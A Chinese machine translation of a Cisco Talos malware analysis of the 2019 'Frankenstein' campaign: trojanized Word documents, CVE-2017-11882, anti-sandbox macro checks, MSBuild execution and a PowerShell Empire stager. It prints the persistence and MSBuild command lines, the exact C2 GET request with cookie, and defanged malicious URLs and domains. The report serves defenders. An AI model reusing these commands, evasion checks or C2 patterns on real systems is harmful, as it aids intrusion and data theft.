黑客攻击者开始拼凑恶意工具开源片段对目标攻击

思科Talos安全研究人员称，最近发现的网络攻击活动利用了多种开源技术相结合的工具。

思科Talos最近确定了一系列文件，他们认为这些文件是被称之为“科学怪人”活动的一系列协调网络攻击的一部分。他们评估了攻击者在2019年1月至4月期间执行这些操作，以便通过恶意文档在用户的计算机上安装恶意软件。此活动是超针对性的，因为各种恶意软件存储库中的这些文档数量很少。弗兰肯斯坦 - 这个名字指的是黑客将几个不相关的组件拼凑在一起的能力 - 利用四种不同的开源技术来构建活动期间使用的工具。

该广告系列使用以下组件：

• 一篇文章，用于检测您的示例何时在VM中运行

• 利用MSbuild执行PowerShell命令的GitHub项目

• GitHub项目的一个组件名为“Fruityc2”来构建一个stager

• 一个名为“PowerShell Empire”的GitHub项目，用于作为代理

  
  

他们认为，弗兰肯斯坦竞选背后的威胁行为者是中等复杂的，资源丰富的。黑客对开源解决方案的偏好似乎是更广泛趋势的一部分，在这种趋势中，对手越来越多地使用公开的解决方案，可能会提高运营安全性。这些混淆技术将要求网络防御者修改其姿势和程序以检测此威胁。

本报告概述了整个弗兰肯斯坦运动中使用的各种反检测技术。其中一些技术包括检查是否有任何分析工具（如Process Explorer）在后台运行并确定样本是否在虚拟机内。威胁参与者还采取了其他步骤，仅响应包含预定义字段的GET请求，例如不存在的用户代理字符串，会话cookie和域上的特定目录。威胁参与者还使用不同类型的加密来保护传输中的数据。

木马文件

Talos已经确定了与此特定活动相关的两种不同的感染媒介。为了危害他们的受害者，威胁演员可能通过电子邮件发送了木马化的Microsoft Word文档。第一个向量依赖于一个获取远程模板然后使用已知漏洞的木马化文档。第二个向量是一个木马化的Word文档，它提示受害者启用宏并运行Visual Basic脚本。由于威胁演员C2的重叠，我们能够将这两种技术与相同的威胁活动相关联。 

在第一个场景中，Talos发现了一个名为“MinutesofMeeting-2May19.docx”的文件，该文件似乎显示了约旦的国旗。一旦受害者打开文档，它就会从actor控制的网站上获取一个删除模板，hxxp：// droobox [。] online：80 / luncher.doc。下载luncher.doc后，它使用CVE-2017-11882在受害者的机器上执行代码。在利用之后，该文件将运行命令脚本以将持久性设置为名为“WinUpdate”的计划任务。

"/Create /F /SC DAILY /ST 09:00 /TN WinUpdate /TR" 该计划任务将运行一系列base64编码的PowerShell命令，这些命令充当stager。将在下一节中更详细地描述该stager。

MinutesofMeeting-2May19.docx的示例

我们分析的一个样本促使受害者启用了声称已经被卡巴斯基（Kaspersky）保护的宏，这是一家着名的反病毒公司。虽然威胁行为者通常会为恶意文档创建虚假的安全标签，但这种技术也可能表明威胁行为者已经对目标受害者进行了侦察，这表明这些文档在某种程度上已经过社交设计。

恶意Microsoft Word文档的示例

我们与该群体相关的另外两份文件似乎更具针对性。一份文件包含似乎来自几个中东国家政府机构的徽标，而另一份文件显示了一些未指明建筑物的图像，这些图像可能是一组精选目标可识别的。

包含官方徽标的特洛伊木马文档

包含不明建筑物图像的木马化文件

Visual Basic脚本及其反分析功能

一旦用户启用了宏，就会开始执行强大的Visual Basic应用程序（VBA）脚本。VBA脚本包含两个反分析功能。首先，它将查询Windows Management Instrumentation（WMI）以检查以下任何应用程序是否正在运行：

VMWare

Vbox

Process Explorer

Process Hacker

ProcMon

Visual Basic

Fiddler

WireShark

接下来，脚本将检查以下任何任务是否正在运行：

VMWare

Vbox

VxStream

AutoIT

VMtools

TCPView

WireShark

Process Explorer

Visual Basic

Fiddler

宏代码的副本，用于检查面向分析的应用程序

如果在枚举过程中发现任何上述应用程序或任务名称，则脚本将停止执行。下一个规避技术是调用WMI并确定分配给系统的核心数。如果核心数小于2，则脚本将停止执行，最终用户将收到一条弹出消息，指出“文件与您的Microsoft Office版本不兼容”。我们评估此技术是在2015 TrustedSec报告之后建模的，用于检测样本是在虚拟机还是沙箱环境中运行。

一旦逃避检查完成，威胁演员就会使用MSbuild来执行一个名为“LOCALAPPDATA Intel instal.xml”的actor创建的文件。基于词法分析，我们高度自信地评估宏脚本的这个组件是基于一个名为“ MSBuild-inline-task ” 的开源项目。虽然这种技术在去年曾被记录，但很少有人观察到它被用于操作。Talos怀疑对手选择了MSBuild，因为它是一个签名的Microsoft二进制文件，这意味着它可以在用于执行任意代码时绕过主机上的应用程序白名单控件。

威胁演员版本的MSbuild-inline-task的副本

该文件的最后一行将从命令行运行编码命令：

cmd.exe /c C:WindowsMicrosoft.NETFrameworkv4.0.30319MSBuild.exe LOCALAPPDATAIntelinstal.xml C:WindowsSystem32

‍‍

一旦“instal.xml”文件开始执行，它就会对base64编码的命令进行反混淆处理。这揭示了一个旨在获得额外有效载荷的stager或小脚本。在分析这个问题时，我们注意到了FruityC2 PowerShell代理的“Get-Data”功能的一些相似之处。一个值得注意的区别是，这个特定的stager包括允许stager通过加密的RC4字节流与命令和控制（C2）通信的功能。在此示例中，威胁actor的C2服务器是域msdn [。]云。可以在下面的图像中看到反混淆的stager的副本。

反混淆的stager的副本

成功执行后，stager连接到C2。但是，为了接收代理，请求需要包含正确的目录，用户代理字符串和会话cookie。预期的GET请求如下：

GET /FC001/JOHN HTTP/1.1

Cookie: session=drYuSCFQdbQYHozM2dku17KYkY8=

User-Agent: Microsoft Internet Explorer

Host: msdn[.]cloud

Connection: Keep-Alive

如果成功，C2将返回一串字符。一旦字符串被RC4解密，它就启动了一个PowerShell Empire代理。PowerShell脚本将尝试枚举主机以查找某些信息，例如：

• 用户名

• 域名

• 机器名称

• 公共IP地址

• 检查当前用户是否具有管理权限

• 获取所有当前正在运行的进程的列表

• 调用WMI以获取操作系统版本

• 获得安全系统的SHA256 HMAC

  
  

一旦获得上述信息，就会将其发送回威胁行为者的C2。与stager类似，除了使用特定的用户代理字符串和会话密钥之外，代理还包括通过加密通道（在本例中为AES-CBC）进行通信的功能。此代理将允许威胁参与者与代理远程交互以上载和下载文件，并使用与Empire框架兼容的各种插件，例如用于在受害者计算机上获取凭据的插件。虽然这个威胁演员表现出复杂的迹象，但有一些小部件被忽视了。例如，似乎威胁玩家忘记为Empire代理配置某些组件，例如为某些变量留下占位符值，例如“WORKING_HOURS_REPLACE”

结论

演员对开源解决方案的偏好似乎是更广泛趋势的一部分，在这种趋势中，攻击者越来越多地使用公开可用的工具，这使得他们比完全自定义的工具集具有一些优势。利用自定义工具的广告系列更容易归功于工具的开发人员。其中一个例子是VPNFilter恶意软件中的代码重叠，它允许我们将活动与Blackenergy恶意软件相关联。相比之下，如果没有额外的见解或智能，使用开源框架执行的操作极难归因。在过去几年中，有多个使用开源技术的高级威胁演员实例，如MuddyWater， 等等。这种不断增长的趋势凸显出训练有素的操作员越来越多地使用简单的工具来实现他们的目标。

哈希

418379fbfe7e26117a36154b1a44711928f52e33830c6a8e740b66bcbe63ec61 

50195be1de27eac67dd3e5918e1fc80acaa16159cb48b4a6ab9451247b81b649 

6b2c71bfc5d2e85140b87c801d82155cd9abd97f84c094570373a9620e81cee0 

6be18e3afeec482c79c9dea119d11d9c1598f59a260156ee54f12c4d914aed8f 

6e6e7ac84b1b0a0ae833ef2cb56592e1a7efc00ffad9b06bce7e676befc84185 

b2600ac9b83e5bb5f3d128dbb337ab1efcdc6ce404adb6678b062e95dbf10c93 

网址

hxxp://droobox[.]online/luncher.doc

hxxp://msdn[.]cloud/FC001/JOHN

hxxp://search-bing[.]site/FC003/User=H6szn1woY2pLV

域名

msdn[.]cloud

search-bing[.]site

droobox[.]online

参考：

https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html

原文始发于微信公众号（红数位）：黑客攻击者开始拼凑恶意工具开源片段对目标攻击